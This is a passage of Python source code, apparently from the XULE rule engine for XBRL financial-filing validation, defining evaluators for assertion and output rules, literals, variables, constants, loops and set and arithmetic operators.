post_trace = " " * xule_context.trace_level
post_trace += ("NONE" if value is None else value.format_value()) + format_trace_info(trace_info[1],
trace_info[2], {},
xule_context)
print("<", trace_is_dependent, trace_source, processing_id, post_trace.replace("\n", " "))
xule_context.trace_level -= 1
try:
value = post_evaluate_value(rule_part, value, xule_context)
finally:
if getattr(xule_context.global_context.options, "xule_trace_count", False):
# if xule_context.show_trace_count:
xule_context.expression_trace[rule_part['node_id']][trace_source] += 1
xule_context.expression_trace[rule_part['node_id']]['iterations-t'] += (
datetime.datetime.today() - expression_trace_start)
xule_context.expression_trace[rule_part['node_id']][trace_source + '-t'] += (
datetime.datetime.today() - expression_trace_start)
trace_written = True
finally:
if getattr(xule_context.global_context.options, "xule_trace_count", False) and not trace_written:
xule_context.expression_trace[rule_part['node_id']][
'iterations-t'] += datetime.datetime.today() - expression_trace_start
xule_context.expression_trace[rule_part['node_id']][trace_source + '-t'] += (
datetime.datetime.today() - expression_trace_start)
xule_context.expression_trace[rule_part['node_id']][trace_source] += 1
trace_written = True
return value
def post_evaluate_value(rule_part, value, xule_context):
"""Track tags and facts for the evaluated value.
:param rule_part: The expression being evaluated
:type rule_part: dict
:param value: The evaluated value
:type value: XuleValue
:param xule_context: The rule processing context
:type xule_context: XuleRuleContext
"""
if value is None:
raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))
# value = XuleValue(xule_context, None, 'unbound')
if value.fact is not None:
# xule_context.facts.append(value.fact)
xule_context.facts[value.fact] = None
if value.facts is not None:
# print("before", len(xule_context.facts), len(set(xule_context.facts)))
# xule_context.facts.extend(value.facts)
# print("after", len(xule_context.facts), len(set(xule_context.facts)))
xule_context.facts.update(value.facts)
if value.tags is not None:
# # Need to make sure that the current version of the tags stay and the update only adds new tags from the value.
# new_tags = value.tags.copy()
# new_tags.update(xule_context.tags)
# xule_context.tags = new_tags
xule_context.tags.update(value.tags)
if value.aligned_result_only == True:
xule_context.aligned_result_only = True
# if value.used_vars is not None:
# new_keys = value.used_vars.keys() - xule_context.vars.keys()
# for new_key in new_keys:
# xule_context.vars[new_key] = value.used_vars[new_key]
if value.used_expressions is not None:
# print("add",rule_part['exprName'], rule_part['node_id'], len(xule_context.used_expressions), len(value.used_expressions))
xule_context.used_expressions.update(value.used_expressions)
if value.type == 'unbound':
raise XuleIterationStop(value)
return value
def get_local_cache_key(rule_part, xule_context):
"""Get a cache key for storing a value in the cache
:param rule_part: xule expression
:type rule_part: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
"""
# Don't cache for function refs that are not cacheable
if (rule_part['exprName'] in ('functionReference', 'macroRef') and rule_part.get('cacheable') != True) or rule_part[
'exprName'] == 'forBodyExpr':
return None
dep_var_index = set()
for var_ref in rule_part['var_refs']:
# var_ref tuple: 0 = var declaration id, 1 = var name, 2 = var ref ast, 3 = var type (1=block variable or 'for' variable, 2=constant, 3=function argument, factset variable)
var_info = xule_context.find_var(var_ref[1], var_ref[0])
if var_info['type'] == xule_context._VAR_TYPE_CONSTANT:
# If it is a constant, the var_info will not contain the value. To determine if the constant is used, the used_expressions are checked.
if xule_context.get_processing_id(var_info['expr']['node_id']) in xule_context.used_expressions:
const_value = evaluate(var_info['expr'],
xule_context,
override_table_id=var_ref[2]['table_id'])
dep_var_index.add((var_info['name'], const_value))
else:
if var_ref[0] in xule_context.vars:
if var_info['calculated']:
dep_var_index.add((var_info['name'], var_info['value']))
alignment = xule_context.iteration_table.current_alignment if rule_part['has_alignment'] else None
cache_key = (rule_part['node_id'], frozenset(dep_var_index), alignment)
return cache_key
def evaluate_assertion(assert_rule, xule_context):
"""Evaluator for an assertion rule.
:param assert_rule: Rule expression for an assertion
:type assert_rule: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
This evaluator evaluates an assertion rule. This evalutor will keep evaluting the assertion rule until the iteration table is empty. This
is how it can produce multiple messages for a single rule. For example, a rule @Assets < 0 will produce a message for each individual
Asset value that is less than zero. If there are 3 values for Assets and 2 of them are less than zero, it will produce 2 messages.
An assertion will evaluate to a boolean value. If the assertion is marked as 'satisfied' and the
evaluated value is true, the assertion will produce a message. If the assertion is marked as unstatisfied and the evaluated value is false,
the assertion will produce a message.
"""
# Keep evaluating the rule while there are iterations. This is done in a While True loop so there is always at least one iteration. This is for rules that
# do not have iterable expressions in them (i.e. 1 + 2).
while True:
xule_context.iter_count += 1
try:
xule_value = evaluate(assert_rule['body'], xule_context)
except XuleIterationStop:
xule_context.iter_pass_count += 1
pass
except:
xule_context.iter_except_count += 1
raise
else:
# There were no exceptions. Check the results of the rule and create the message.
# Check if the rule expects only aligned values. When a rule has aligned values then the none aligned results are ignored.
# This prevents a rule like 1 + @Assets from producing a result when there are no Assets in a filing. When this happens, the @Assetss will have
# a none aligned unbound value. The plus operation will treat this as 0 and produce a value of 1. However, this value should not result in a message.
# When a factset is evluated, it trips the aligned_result_only flag.
if xule_value.type != 'unbound' and not (
xule_context.iteration_table.current_alignment is None and xule_context.aligned_result_only):
if xule_value.type != 'bool':
raise XuleProcessingError(_("Raise %s did not evaluate to a boolean, found '%s'." % (
xule_context.rule_name, xule_value.type)), xule_context)
# Determine if a message should be sent
send_message = ((assert_rule['satisfactionType'] == 'satisfied' and xule_value.value == True) or
(assert_rule['satisfactionType'] == 'unsatisfied' and xule_value.value == False))
if send_message:
xule_context.iter_message_count += 1
messages = dict()
# Process each of the results in the rule. The Results are the messages that are produced.
for rule_result in assert_rule.get('results', list()):
messages[rule_result['resultName']] = result_message(assert_rule, rule_result, xule_value,
xule_context)
# get severity
if 'severity' not in messages:
# default severity
messages['severity'] = 'error'
severity = messages['severity']
# message - this is the main message
main_message = messages['message'].value if 'message' in messages else XuleString(
'No message supplied')
messages.pop('message', None)
full_rule_name = xule_context.rule_name
# Handle rule suffix
if 'rule-suffix' in messages:
full_rule_name += '.' + messages['rule-suffix']
filing_url = xule_context.model.modelDocument.uri if xule_context.model is not None else ''
# The rule_focus is the model object that is the focus fo the rule. This can be a modelFact, modelConcept or modelDocument.
# It is used by the logger to provide additional location information about the thing (i.e. fact) that is the focus of the
# message fom the rule.
rule_focus = messages.pop('rule-focus', None)
if rule_focus is None:
rule_focus = next(iter(xule_context.facts.keys()), None)
# Prep the main_message for the logger. The logger wants a %-style format string and the substitutions passed as named arguments.
if isinstance(main_message, XuleString):
format_string_message = main_message.format_string
substitutions = main_message.substitutions
else:
format_string_message = main_message
substitutions = dict()
# combine the substitutions and the messages dictionary
messages.update(substitutions)
xule_context.global_context.message_queue.log(severity.upper(),
full_rule_name,
_(format_string_message),
# sourceFileLine=source_location,
filing_url=filing_url,
modelObject=rule_focus,
**messages)
else:
xule_context.iter_pass_count += 1
else:
xule_context.iter_misaligned_count += 1
# xule_context.iteration_table.del_current()
# if xule_context.iteration_table.is_empty:
xule_context.iteration_table.next(assert_rule['node_id'])
if xule_context.iteration_table.is_table_empty(assert_rule['node_id']):
break
else:
xule_context.reset_iteration()
def evaluate_output_rule(output_rule, xule_context):
"""Evaluator for an output rule.
:param output_rule: Rule expression for an assertion
:type output_rule: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
This evaluator evaluates an output rule. This evalutor will keep evaluting the output rule until the iteration table is empty. This
is how it can produce multiple messages for a single rule.
An output rule will produce a value and then create a message based on the evaluated value.
"""
# Keep evaluating the rule while there are iterations. This is done in a While True loop so there is always at least one iteration. This is for rules that
# do not have iterable expressions in them (i.e. 1 + 2).
while True:
xule_context.iter_count += 1
try:
xule_value = evaluate(output_rule['body'], xule_context)
except XuleIterationStop:
xule_context.iter_pass_count += 1
pass
except:
xule_context.iter_except_count += 1
raise
else:
# There were no exceptions. Check the results of the rule and create the message.
# Check if the rule expects only aligned values. When a rule has aligned values then the none aligned results are ignored.
# This prevents a rule like 1 + @Assets from producing a result when there are no Assets in a filing. When this happens, the @Assetss will have
# a none aligned unbound value. The plus operation will treat this as 0 and produce a value of 1. However, this value should not result in a message.
# When a factset is evluated, it trips the aligned_result_only flag.
if xule_value.type != 'unbound' and not (
xule_context.iteration_table.current_alignment is None and xule_context.aligned_result_only):
# Determine if a message should be sent
xule_context.iter_message_count += 1
messages = dict()
# Process each of the results in the rule. The Results are the messages that are produced.
for rule_result in output_rule.get('results', list()):
messages[rule_result['resultName']] = result_message(output_rule, rule_result, xule_value,
xule_context)
# get severity
if 'severity' not in messages:
# default severity
messages['severity'] = 'info'
severity = messages['severity']
# message - this is the main message
main_message = messages.get('message', xule_value)
if main_message.type == 'string':
main_message = main_message.value
else:
main_message = main_message.format_value()
messages.pop('message', None)
full_rule_name = xule_context.rule_name
# Handle rule suffix
if 'rule-suffix' in messages:
full_rule_name += '.' + messages['rule-suffix']
filing_url = xule_context.model.modelDocument.uri if xule_context.model is not None else ''
# The rule_focus is the model object that is the focus fo the rule. This can be a modelFact, modelConcept or modelDocument.
# It is used by the logger to provide additional location information about the thing (i.e. fact) that is the focus of the
# message fom the rule.
rule_focus = messages.pop('rule-focus', None)
if rule_focus is None:
rule_focus = next(iter(xule_context.facts.keys()), None)
# Prep the main_message for the logger. The logger wants a %-style format string and the substitutions passed as named arguments.
if isinstance(main_message, XuleString):
format_string_message = main_message.format_string
substitutions = main_message.substitutions
else:
format_string_message = main_message
substitutions = dict()
# combine the substitutions and the messages dictionary
messages.update(substitutions)
xule_context.global_context.message_queue.log(severity.upper(),
full_rule_name,
_(format_string_message),
# sourceFileLine=source_location,
filing_url=filing_url,
modelObject=rule_focus,
**messages)
else:
xule_context.iter_misaligned_count += 1
# xule_context.iteration_table.del_current()
# if xule_context.iteration_table.is_empty:
xule_context.iteration_table.next(output_rule['node_id'])
if xule_context.iteration_table.is_table_empty(output_rule['node_id']):
break
else:
xule_context.reset_iteration()
def evaluate_bool_literal(literal, xule_context):
"""Evaluator for literal boolean expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A boolean literal is either 'true' or 'false'.
"""
if literal['value'] == "true":
return XuleValue(xule_context, True, 'bool')
elif literal['value'] == "false":
return XuleValue(xule_context, False, 'bool')
else:
raise XuleProcessingError(_("Invalid boolean literal found: %s" % literal.value), xule_context)
def evaluate_period_literal(literal, xule_context):
"""Evaluate a period literal
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
Currently, the only type of period literal is 'forever'. Other periods (instance, duration) are created using
the period() function.
"""
if literal.get('forever', False):
return XuleValue(xule_context, (datetime.datetime.min, datetime.datetime.max), 'duration')
else:
return XuleValue(xule_context, None, 'none')
def evaluate_string_literal(literal, xule_context):
"""Evaluate a string literal
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A string can consist of a string of characters, escaped characters or an expression to evaluate. The literal will contain a list
of these components that make up the string. For example:
"The value of the rule is {$rule-value}.\nThis is based on the fact value {$fact}.".
In this example the literal would be a list of:
* string of characters: "The value of the rule is "
* an expression: $rule-value
* string of characters: "."
* escape character: "\n"
* string of characters: "This is based on the fact value "
* an expression: $fact
* string of characters: "."
This evaluator will evaluate all the components of the string literal and concatenate them to a string.
"""
# result_string = ''
# The underlying value for the XuleValue that is created from this evaluator is a XuleString. A XuleString is subclassed
# from a python str. A XuleString stores a format string along with the subsitutions. It will create the formatted string and set that
# as the value of the XuleSting. This way it will act and feel like a python string but will contain the original format string and
# subsitutiions. Having the format string and substitutions separate is usefuly when logging messages to arelle.
format_string = ''
substitutions = []
sub_num = 0
for string_item in literal['stringList']:
if string_item['exprName'] == 'baseString':
format_string += string_item['value']
elif string_item['exprName'] == 'escape':
if string_item['value'] == 'n':
format_string += '\n'
elif string_item['value'] == 't':
format_string += '\t'
else:
format_string += string_item['value']
else:
# This is an expression.
expr_value = evaluate(string_item, xule_context)
# The result of the expression is not directly put in the format string. Instead a substitution is used
sub_name = 'sub{}'.format(sub_num)
sub_num += 1
# Substitutions is a list of a 3 part tuple 0=location in format string, 1=substitution name, 2=substitution value
substitutions.append((len(format_string), sub_name, expr_value.format_value()))
return XuleValue(xule_context, XuleString(format_string, substitutions), 'string')
def evaluate_int_literal(literal, xule_context):
"""Evaluator for literal integer expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
return XuleValue(xule_context, int(literal['value']), 'int')
def evaluate_float_literal(literal, xule_context):
"""Evaluator for literal float expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
return XuleValue(xule_context, float(literal['value']), 'float')
def evaluate_void_literal(literal, xule_context):
"""Evaluator for literal void expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A void expression is either 'none' or 'skip'.
"""
return XuleValue(xule_context, None, 'none' if literal['value'] == 'none' else 'unbound')
def evaluate_qname_literal(literal, xule_context):
"""Evaluator for literal qname expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
prefix = literal['prefix']
return XuleValue(xule_context,
QName(prefix if prefix != '*' else None, literal['namespace_uri'], literal['localName']), 'qname')
def evaluate_severity(severity_expr, xule_context):
"""Evaluator for literal severity expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
return XuleValue(xule_context, severity_expr['value'], 'severity')
def evaluate_aspect_name(literal, xule_context):
"""Evaluator for literal aspect name expressions
:param literal: Rule expression
:type literal: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
An aspect name is literal is one of the build in aspects for a factset and is one of 'concept', 'unit', 'entity' or 'period'.
"""
return XuleValue(xule_context, literal['value'], 'aspect_name')
def evaluate_string_keyword(expr, xule_context):
"""Evaluator for literal string based keywords expressions
:param expr: Rule expression
:type expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
Some keywords are evaluated as strings. This is used for balance types ('credit', 'debit') and period type ('instant', 'duration').
"""
return XuleValue(xule_context, expr['value'], 'string')
def evaluate_tagged(tagged_expr, xule_context):
"""Evaluator for tagged expressions
:param tagged_expr: Rule expression
:type tagged_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A tagged expression is an expression followed by a # sign and a tag name. The evaluated value of the tagged expression
is added to the rule processing context by its name. The tags can be used in creating messages.
"""
try:
tagged_value = evaluate(tagged_expr['expr'], xule_context)
except XuleIterationStop as xis:
xule_context.tags[tagged_expr['tagName']] = xis.stop_value.tag
raise
else:
# xule_context.tags[tagged_expr.tagName] = tagged_value
if tagged_value.tags is None:
tagged_value.tags = {tagged_expr['tagName']: tagged_value}
else:
tagged_value.tags[tagged_expr['tagName']] = tagged_value
return tagged_value
def tag_default_for_factset(aspect_filters, xule_context):
"""Get the value of the concept aspect for tagging the default None fact of a factset"""
for aspect_info, aspect_value in aspect_filters.items():
# aspect_inf is the aspect_info that is the key to the aspect_filters dictionary
# aspect_info is a tuple. The 0 = type (builtin or explicit_dimension, 1 = aspect name, 2 = wildcard, 3 = operator, properties
if aspect_info[0] == 'builtin' and aspect_info[1] == 'concept':
if aspect_info[2] is None: # there isn't a wildcard
if aspect_info[3] == '=': # the operator is '=' and it is not a wildcard
return str(aspect_value)
elif aspect_info[3] == 'in':
# the aspect_value is a list or set of names.
concepts = []
for aspect_name in aspect_value.value:
if aspect_name == 'qname':
concepts.append(str(aspect_name.value))
elif aspect_name == 'concept':
concepts.append(str(aspect_name.value.qname))
if len(concetps) == 1:
return str(concepts[0])
else:
return 'one of (' + ', '.join(concepts) + ')'
# If we get here, then the default tag is unknown
return 'unknown'
def evaluate_block(block_expr, xule_context):
"""Evaluator for block expressions
:param block_expr: Rule expression
:type block_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A block expression is a series of variable declarations followed by an expression.
"""
for var_assignment in block_expr['varDeclarations']:
# for var_assignment in var_assignments:
var_info = xule_context.add_var(var_assignment['varName'],
var_assignment['node_id'],
var_assignment['varName'], # tagged - all variables are tagged
var_assignment['body'])
calc_var(var_info, None, xule_context)
return evaluate(block_expr['expr'], xule_context)
def evaluate_var_ref(var_ref, xule_context):
"""Evaluator for block expressions
:param var_ref: Rule expression
:type var_ref: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
# print(var_ref['node_id'], var_ref.varName)
var_info = xule_context.find_var(var_ref['varName'], var_ref['var_declaration'])
# xule_context.used_vars.append(var_ref.var_declaration)
try:
var_value = calc_var(var_info, var_ref, xule_context)
except XuleIterationStop as xis:
var_value = xis.stop_value
raise
return var_value
def calc_var(var_info, const_ref, xule_context):
"""Calculate the value of a variable
:param var_info: A dictionary of meta data about the variable
:type var_info: dict
:param const_ref: The constant declaration if the variable reference is for a constant
:type const_ref: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
This function evaluates the expression for the variable reference.
"""
if var_info['type'] == xule_context._VAR_TYPE_ARG:
var_value = var_info['value']
elif var_info['type'] == xule_context._VAR_TYPE_VAR:
if var_info['calculated'] == False:
try:
saved_aligned_result_only = xule_context.aligned_result_only
saved_used_expressions = xule_context.used_expressions
xule_context.aligned_result_only = False
xule_context.used_expressions = set()
try:
var_info['value'] = evaluate(var_info['expr'], xule_context)
var_info['value'].aligned_result_only = xule_context.aligned_result_only
var_info['value'].used_expressions = xule_context.used_expressions
var_info['calculated'] = True
except XuleIterationStop as xis:
var_info['value'] = xis.stop_value
var_info['value'].aligned_result_only = xule_context.aligned_result_only
var_info['value'].used_expressions = xule_context.used_expressions
var_info['calculated'] = True
# raise
finally:
xule_context.aligned_result_only = xule_context.aligned_result_only or saved_aligned_result_only
xule_context.used_expressions = saved_used_expressions | xule_context.used_expressions
var_value = var_info['value']
elif var_info['type'] == xule_context._VAR_TYPE_CONSTANT:
# We should only end up here the first time the constant is referenced for the iteration.
# The var_info is really the constant info from the global context
var_value = evaluate(var_info['expr'], xule_context, override_table_id=const_ref['table_id'])
else:
raise XuleProcessingError(_("Internal error: unkown variable type '%s'" % var_info['type']), xule_context)
var_value = var_value.clone()
# if var_info['tagged']:
if var_info['tagged'] is not None:
xule_context.tags[var_info['tagged']] = var_value
return var_value
def calc_constant(const_info, const_context):
"""Calculate the value of a constant
:param const_info: Meta data about the constant
:type const_info: dict
:param const_context: Rule processing context
:type const_context: XuleRuleContext
:returns: The evaluated value or values
:rtype: XuleValue or XuleValueSet
Constants are evaluated in a separate table. This isolates the evaluation from the rule which is using the constant. If the
constant produces a singleton value a single value is returned. If the constant produces multiple values, a value set is returned.
"""
const_context.iteration_table.add_table(const_info['expr']['node_id'],
const_context.get_processing_id(const_info['expr']['node_id']))
const_values = XuleValueSet()
while True:
const_context.aligned_result_only = False
const_context.used_expressions = set()
try:
const_value = evaluate(const_info['expr']['body'], const_context)
except XuleIterationStop as xis:
const_value = xis.stop_value # XuleValue(const_context, None, 'unbound')
const_value.facts = const_context.facts.copy()
const_value.tags = const_context.tags.copy()
const_value.aligned_result_only = const_context.aligned_result_only
# const_value.used_expressions = const_context.used_expressions
try:
const_value.alignment = const_context.iteration_table.current_table.current_alignment
except AttributeError:
# This happens if there isn't a current table because it was never created.
pass
const_values.append(const_value)
# const_context.iteration_table.del_current()
if not const_context.iteration_table.is_empty:
const_context.iteration_table.next(const_context.iteration_table.current_table.table_id)
# if const_context.iteration_table.is_empty:
if const_context.iteration_table.is_table_empty(const_info['expr']['node_id']):
break
# else:
# const_context.reset_iteration()
# reset the aligned only results.
const_info['expr']['aligned_only_results'] = const_context.aligned_result_only
const_info['value'] = const_values
const_info['calculated'] = True
def override_constant_calc(const_info, xule_context):
const_values = XuleValueSet(xule_context.constant_overrides[const_info['name']])
const_info['value'] = const_values
const_info['calculated'] = True
def evaluate_constant_assign(const_assign, xule_context):
"""Evaluator a constant declaration
:param const_assign: Rule expression for the constant declaration
:type const_assign: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
const_info = xule_context.find_var(const_assign['constantName'], const_assign['node_id'], constant_only=True)
if const_info is None:
raise XuleProcessingError(_("Constant '%s' not found" % const_assign['constantName']), xule_context)
if not const_info['calculated']:
# Check if there is a xule-arg that overrides the constant
if const_assign['constantName'] in xule_context.constant_overrides:
override_constant_calc(const_info, xule_context)
else: # calc the constant
const_context = XuleRuleContext(xule_context.global_context, None,
xule_context.cat_file_num)
calc_constant(const_info, const_context)
# Clean up
del const_context
if 'is_iterable' in const_assign:
# return the entire value set
return const_info['value']
else:
# retrieve the single value
return const_info['value'].values[None][0]
def process_precalc_constants(global_context):
"""Precalculate constants
:param global_context: Global processing context
:type global_context: XuleGlobalContext
This function will calculate constants that do not depend directly on the instance.
"""
global_context.message_queue.logging("Precalcing non-instance constants")
for constant_name, cat_constant in global_context.rule_set.catalog['constants'].items():
if ('unused' not in cat_constant and
not cat_constant['dependencies']['instance']):
const_context = XuleRuleContext(global_context, constant_name, cat_constant['file'])
const_info = const_context.find_var(constant_name, cat_constant['node_id'])
if not const_info['calculated']:
calc_constant(const_info, const_context)
# Clean up
del const_context
def evaluate_if(if_expr, xule_context):
"""Evaluator for if expressions
:param if_expr: Rule expression for the constant declaration
:type if_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
if_thens = []
if_thens.append((if_expr['condition'], if_expr['thenExpr']))
for else_if in if_expr.get('elseIfExprs', []):
if_thens.append((else_if['condition'], else_if['thenExpr']))
for if_then in if_thens:
condition_value = evaluate(if_then[0], xule_context)
if condition_value.type in ('unbound', 'none'):
return XuleValue(xule_context, None, 'unbound')
elif condition_value.type != 'bool':
raise XuleProcessingError(_("If condition is not a boolean, found '%s'" % condition_value.type),
xule_context)
else:
if condition_value.value:
return evaluate(if_then[1], xule_context)
# This is only hit if none of the if conditions passed
return evaluate(if_expr['elseExpr'], xule_context)
def evaluate_for(for_expr, xule_context):
"""Evaluator for for expressions
:param for_expr: Rule expression for the constant declaration
:type for_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValueSet
"""
for_values = XuleValueSet()
saved_used_expressions = xule_context.used_expressions
xule_context.used_expressions = set()
try:
for_loop_collection = evaluate(for_expr['forLoopExpr'], xule_context)
finally:
used_expressions = xule_context.used_expressions
xule_context.used_expressions = saved_used_expressions | used_expressions
if for_loop_collection.type not in ('list', 'set'):
raise XuleProcessingError(_("For loop requires a set or list, found '{}'.".format(for_loop_collection.type)),
xule_context)
for for_loop_var in for_loop_collection.value:
if for_loop_var.used_expressions is None:
for_loop_var.used_expressions = used_expressions
else:
for_loop_var.used_expressions.update(used_expressions)
xule_context.add_arg(for_expr['forVar'],
for_expr['forLoopExpr']['node_id'],
for_expr['forVar'], # tagged - all variables are automatically tagged
for_loop_var,
'single')
try:
body_values = evaluate_for_body_detail(for_expr['forBodyExpr'],
for_expr['node_id'],
for_loop_var,
for_expr['forVar'], # tag name
xule_context)
finally:
xule_context.del_arg(for_expr['forVar'], for_expr['forLoopExpr']['node_id'])
if for_loop_var.alignment is None:
# add all
for body_value in body_values.values.values():
for_values.append(body_value)
else:
if for_loop_var.alignment in body_values.values:
# take the aligned values
for body_value in body_values.values[for_loop_var.alignment]:
for_values.append(body_value)
else:
# take only none aligned values and add alignment
for body_value in body_values.values[None]:
body_value.alignment = for_loop_var.alignment
for_values.append(body_value)
return for_values
def evaluate_for_body_detail(body_expr, table_id, for_loop_var, for_loop_tag, xule_context):
"""Evaluates the for body
:param body_expr: Rule expression for the for body
:type body_expr: dict
:param table_id: The table id for the sub table to evaluate the for body
:type table_id: int
:param for_loop_var: The xuel value of the for loop variable
:type for_loop_var: XuleValue
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValueSet
"""
body_values = XuleValueSet()
aligned_result_only = False
save_aligned_result_only = xule_context.aligned_result_only
save_used_expressions = xule_context.used_expressions
# for_body_table = xule_context.iteration_table.add_table(xule_context.get_processing_id(body_expr['node_id']), is_aggregation=True)
for_body_table = xule_context.iteration_table.add_table(table_id, xule_context.get_processing_id(table_id),
is_aggregation=True)
for_body_table.dependent_alignment = for_loop_var.alignment
# add the loop control to the table
# xule_context.iteration_table.add_column(rule_part, for_body_table.table_id, processing_id, values, xule_context)
try:
while True:
xule_context.aligned_result_only = False
xule_context.used_expressions = set()
xule_context.tags[for_loop_tag] = for_loop_var
body_value = XuleValue(xule_context, None, 'unbound')
try:
body_value = evaluate(body_expr, xule_context)
except XuleIterationStop:
pass
aligned_result_only = aligned_result_only or xule_context.aligned_result_only
body_value.alignment = for_body_table.current_alignment # xule_context.iteration_table.dependent_alignment or xule_context.iteration_table.current_table.current_alignment
body_value.aligned_result_only = aligned_result_only
body_value.facts = xule_context.iteration_table.facts.copy()
body_value.tags = xule_context.iteration_table.tags.copy()
# print("for", body_expr['exprName'], body_expr['node_id'], len(xule_context.used_expressions), len(body_value.used_expressions))
body_value.used_expressions = xule_context.used_expressions
body_values.append(body_value)
xule_context.iteration_table.next(for_body_table.table_id)
if for_body_table.is_empty:
break
finally:
xule_context.aligned_result_only = save_aligned_result_only
xule_context.used_expressions = save_used_expressions
xule_context.iteration_table.del_table(for_body_table.table_id)
return body_values
def evaluate_unary(unary_expr, xule_context):
"""Evaluator for unary expressions
:param unary_expr: Rule expression for the constant declaration
:type unary_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
A unary expression is a plus or minus that flips the sign of a number.
"""
initial_value = evaluate(unary_expr['expr'], xule_context)
if initial_value.type in ('unbound', 'none'):
return initial_value
if initial_value.type not in ('int', 'float', 'decimal'):
raise XuleProcessingError(_("Unary operator requires a numeric operand, found '%s'" % initial_value.type),
xule_context)
if unary_expr['op'] == '-':
return XuleValue(xule_context, initial_value.value * -1, initial_value.type)
else:
return initial_value
def evaluate_in(in_expr, xule_context):
"""Evaluator for in expressions
:param in_expr: Rule expression for the in expression
:type in_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
left = evaluate(in_expr['leftExpr'], xule_context)
for right_side in in_expr['rights']:
right = evaluate(right_side['rightExpr'], xule_context)
if right.type in ('unbound', 'none'):
left = XuleValue(xule_context, None, 'unbound')
else:
left = XuleProperties.property_contains(xule_context, right, left)
return left
def evaluate_mult(mult_expr, xule_context):
"""Evaluator for multiplication expressions
:param mult_expr: Rule expression for the constant declaration
:type mult_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
This include multiplication and division
"""
left = evaluate(mult_expr['leftExpr'], xule_context)
for right_side in mult_expr['rights']:
operator = right_side['op']
right = evaluate(right_side['rightExpr'], xule_context)
if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
left = XuleValue(xule_context, None, 'unbound')
else:
# if left.type == 'unit' and right.type == 'unit':
# #units have special handling
# if operator == '*':
# left = XuleValue(xule_context, unit_multiply(left.value, right.value), 'unit')
# else:
# left = XuleValue(xule_context, unit_divide(left.value, right.value), 'unit')
# else:
# at this point there should only be numerics.
if left.type not in ('int', 'float', 'decimal'):
raise XuleProcessingError(
_("The left operand of '%s' is not numeric, found '%s'" % (operator, left.type)), xule_context)
if right.type not in ('int', 'float', 'decimal'):
raise XuleProcessingError(
_("The right operand of '%s' is not numeric, found '%s'" % (operator, right.type)), xule_context)
combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
'''NEED TO HANDLE CHNAGES IN UNIT ALIGNMENT'''
if operator == '*':
left = XuleValue(xule_context, left_compute_value * right_compute_value, combined_type)
else:
# This is division
if right_compute_value == 0:
raise XuleProcessingError(_("Divide by zero error."), xule_context)
left = XuleValue(xule_context, left_compute_value / right_compute_value, 'float' if combined_type == 'int' else combined_type)
return left
def evaluate_intersect(inter_expr, xule_context):
"""Evaluator for intersection expressions
:param inter_expr: Rule expression for the constant declaration
:type inter_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
This is intersection of 2 sets.
"""
left = evaluate(inter_expr['leftExpr'], xule_context)
for right_side in inter_expr['rights']:
right = evaluate(right_side['rightExpr'], xule_context)
if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
left = XuleValue(xule_context, None, 'unbound')
if left.type != 'set':
raise XuleProcessingError(
_("Intersection can only operatate on sets. The left side is a '{}'.".format(left.type)), xule_context)
if right.type != 'set':
raise XuleProcessingError(
_("Intersection can only operatate on sets. The right side is a '{}'.".format(right.type)),
xule_context)
left = XuleUtility.intersect_sets(xule_context, left, right)
return left
def evaluate_symetric_difference(sym_diff_expr, xule_context):
"""Evaluator for symetric difference expressions
:param inter_expr: Rule expression for the constant declaration
:type inter_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
This is the symetric difference of 2 sets.
"""
left = evaluate(sym_diff_expr['leftExpr'], xule_context)
for right_side in sym_diff_expr['rights']:
right = evaluate(right_side['rightExpr'], xule_context)
if left.type in ('unbound', 'none') or right.type in ('unbound', 'none'):
left = XuleValue(xule_context, None, 'unbound')
if left.type != 'set':
raise XuleProcessingError(
_("Symetric difference can only operatate on sets. The left side is a '{}'.".format(left.type)),
xule_context)
if right.type != 'set':
raise XuleProcessingError(
_("Symetric difference can only operatate on sets. The right side is a '{}'.".format(right.type)),
xule_context)
left = XuleUtility.symetric_difference(xule_context, left, right)
return left
def evaluate_add(add_expr, xule_context):
"""Evaluator for add expressions
